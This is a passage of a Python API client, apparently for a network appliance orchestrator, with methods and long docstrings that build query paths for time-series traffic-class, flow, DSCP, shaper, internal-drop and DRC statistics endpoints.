:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``
:type traffic_type: str
:param traffic_class: Filter for data which belongs to particular
traffic class, accepted values between 1-10
:type traffic_class: int
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/trafficClass?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&trafficClass={}".format(traffic_class)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
data = {"ids": ne_pk_list}
return self._post(path, data=data)
def get_timeseries_stats_traffic_class_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
traffic_type: str,
traffic_class: int,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series traffic class statistics for a single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/trafficClass/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``
:type traffic_type: str
:param traffic_class: Filter for data which belongs to particular
traffic class, accepted values between 1-10
:type traffic_class: int
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/trafficClass?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&trafficClass={}".format(traffic_class)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_flow(
self,
start_time: int,
end_time: int,
granularity: str,
group_pk: str = None,
traffic_type: str = "all_traffic",
flow_type: str = "TCP_ACCELERATED",
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series flow statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/flow
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param group_pk: Filter by appliance group identifier,
e.g. ``0.Network`` is root group, ``1.Network`` is internal use,
``2.Network`` is auto-discovered groups, ``3.Network`` and
beyond is user-defined groups, defaults to None
:type group_pk: str, optional
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to "all_traffic"
:type traffic_type: str, optional
:param flow_type: Filter for data belonging to a particular flow
type, accepted values are ``TCP_ACCELERATED``,
``TCP_NON_ACCELERATED``, and ``NON_TCP``,
defaults to "TCP_ACCELERATED"
:type flow_type: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/flow?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
if group_pk is not None:
path = path + "&groupPk={}".format(group_pk)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&flowType={}".format(flow_type)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_flow_ne_pk_list(
self,
ne_pk_list: list[str],
start_time: int,
end_time: int,
granularity: str,
traffic_type: str = "all_traffic",
flow_type: str = "TCP_ACCELERATED",
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series flow statistics for list of appliances
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- POST
- /stats/timeseries/flow
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk_list: List of one or more appliance Network Primary
Keys (nePk), e.g. ``["3.NE","5.NE"]``
:type ne_pk_list: list[str]
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to "all_traffic"
:type traffic_type: str
:param flow_type: Filter for data belonging to a particular flow
type, accepted values are ``TCP_ACCELERATED``,
``TCP_NON_ACCELERATED``, and ``NON_TCP``,
defaults to "TCP_ACCELERATED"
:type flow_type: str
:param limit: Limit the number of stats entity retrieved.
When unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/flow?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&flowType={}".format(flow_type)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
data = {"ids": ne_pk_list}
return self._post(path, data=data)
def get_timeseries_stats_flow_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
traffic_type: str = "all_traffic",
flow_type: str = "TCP_ACCELERATED",
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series flow statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/flow/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to "all_traffic"
:type traffic_type: str
:param flow_type: Filter for data belonging to a particular flow
type, accepted values are ``TCP_ACCELERATED``,
``TCP_NON_ACCELERATED``, and ``NON_TCP``,
defaults to "TCP_ACCELERATED"
:type flow_type: str
:param limit: Limit the number of stats entity retrieved.
When unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/flow/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&flowType={}".format(flow_type)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_dscp(
self,
start_time: int,
end_time: int,
granularity: str,
dscp: int,
group_pk: str = None,
traffic_type: str = "all_traffic",
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series dscp statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/dscp
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param dscp: Filter for data which belongs to a certain DSCP type,
valid values are ``0`` through ``63``
:type dscp: int
:param group_pk: Filter by appliance group identifier,
e.g. ``0.Network`` is root group, ``1.Network`` is internal use,
``2.Network`` is auto-discovered groups, ``3.Network`` and
beyond is user-defined groups, defaults to None
:type group_pk: str
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to "all_traffic"
:type traffic_type: str
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/dscp?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
if group_pk is not None:
path = path + "&groupPk={}".format(group_pk)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&dscp={}".format(dscp)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_dscp_ne_pk_list(
self,
ne_pk_list: list[str],
start_time: int,
end_time: int,
granularity: str,
dscp: int,
traffic_type: str = "all_traffic",
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series dscp statistics for list of appliances
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- POST
- /stats/timeseries/dscp
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk_list: List of one or more appliance Network Primary
Keys (nePk), e.g. ``["3.NE","5.NE"]``
:type ne_pk_list: list[str]
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param dscp: Filter for data which belongs to a certain DSCP type,
accepted values are within the range ``[0,63]``
:type dscp: int
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to "all_traffic"
:type traffic_type: str
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/dscp?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&dscp={}".format(dscp)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
data = {"ids": ne_pk_list}
return self._post(path, data=data)
def get_timeseries_stats_dscp_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
dscp: int,
traffic_type: str = "all_traffic",
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series dscp statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/dscp/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param dscp: Filter for data which belongs to a certain DSCP type,
accepted values are within the range ``[0,63]``
:type dscp: int
:param traffic_type: Filter for data for given traffic type,
accepted values are ``optimized_traffic``,
``pass_through_shaped``, ``pass_through_unshaped``, and
``all_traffic``, defaults to "all_traffic"
:type traffic_type: str
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/dscp/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
path = path + "&trafficType={}".format(traffic_type)
path = path + "&dscp={}".format(dscp)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_shaper(
self,
start_time: int,
end_time: int,
granularity: str,
traffic_class: int,
direction: int,
group_pk: str = None,
data_format: str = None,
ip: bool = None,
) -> dict:
"""Get time series shaper statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/shaper
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_class: Filter for data which belongs to particular
traffic class, accepted values are within the range ``[1,10]``
:type traffic_class: int
:param direction: 0 for Outbound, 1 for inbound
:type direction: int
:param group_pk: Filter by appliance group identifier,
e.g. ``0.Network`` is root group, ``1.Network`` is internal use,
``2.Network`` is auto-discovered groups, ``3.Network`` and
beyond is user-defined groups, defaults to None
:type group_pk: str, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/shaper?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
if group_pk is not None:
path = path + "&groupPk={}".format(group_pk)
path = path + "&trafficClass={}".format(traffic_class)
path = path + "&direction={}".format(direction)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
return self._get(path)
def get_timeseries_stats_shaper_ne_pk_list(
self,
ne_pk_list: list[str],
start_time: int,
end_time: int,
granularity: str,
traffic_class: int,
direction: int,
data_format: str = None,
ip: bool = None,
) -> dict:
"""Get time series shaper statistics for list of appliances
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- POST
- /stats/timeseries/shaper
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk_list: List of one or more appliance Network Primary
Keys (nePk), e.g. ``["3.NE","5.NE"]``
:type ne_pk_list: list[str]
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param traffic_class: Filter for data which belongs to particular
traffic class, accepted values are within the range ``[1,10]``
:type traffic_class: int
:param direction: 0 for Outbound, 1 for inbound
:type direction: int
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/shaper?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
path = path + "&trafficClass={}".format(traffic_class)
path = path + "&direction={}".format(direction)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
data = {"ids": ne_pk_list}
return self._post(path, data=data)
def get_timeseries_stats_internal_drops_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
) -> dict:
"""Get time series internal drops statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/internalDrops/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/internalDrops/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
return self._get(path)
def get_timeseries_stats_drc(
self,
start_time: int,
end_time: int,
granularity: str,
group_pk: str = None,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series drc statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/drc
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param group_pk: Filter by appliance group identifier,
e.g. ``0.Network`` is root group, ``1.Network`` is internal use,
``2.Network`` is auto-discovered groups, ``3.Network`` and
beyond is user-defined groups, defaults to None
:type group_pk: str, optional
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/drc?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
if group_pk is not None:
path = path + "&groupPk={}".format(group_pk)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
def get_timeseries_stats_drc_ne_pk_list(
self,
ne_pk_list: list[str],
start_time: int,
end_time: int,
granularity: str,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series drc statistics for list of appliances
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- POST
- /stats/timeseries/drc
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk_list: List of one or more appliance Network Primary
Keys (nePk), e.g. ``["3.NE","5.NE"]``
:type ne_pk_list: list[str]
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param limit: Limit the number of stats entity retrieved. When
unspecified, defaults to 10,000 which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param ip: ``True`` to use IP address as key to sort results and
``False`` or ``None`` to sort by appliance ID,
defaults to None
:type ip: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/drc?startTime="
+ "{}&endTime={}&granularity={}".format(
start_time, end_time, granularity
)
)
if limit is not None:
path = path + "&limit={}".format(limit)
if data_format is not None:
path = path + "&format={}".format(data_format)
if ip is not None:
path = path + "&ip={}".format(ip)
if latest is not None:
path = path + "&latest={}".format(latest)
data = {"ids": ne_pk_list}
return self._post(path, data=data)
def get_timeseries_stats_drc_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
tunnel_name: str,
limit: int = None,
data_format: str = None,
ip: bool = None,
latest: int = None,
) -> dict:
"""Get time series drc statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/drc/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array containing the names indicating what
corresponding number in data array means. Data objects of each
appliance is an array of data arrays, each data array contains the
stats for a particular timestamp. Each number is data array
corresponds to a name in COLUMN_DEF.
DATA object contains only values not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param tunnel_name: Filter for data which belongs to specified
tunnel name
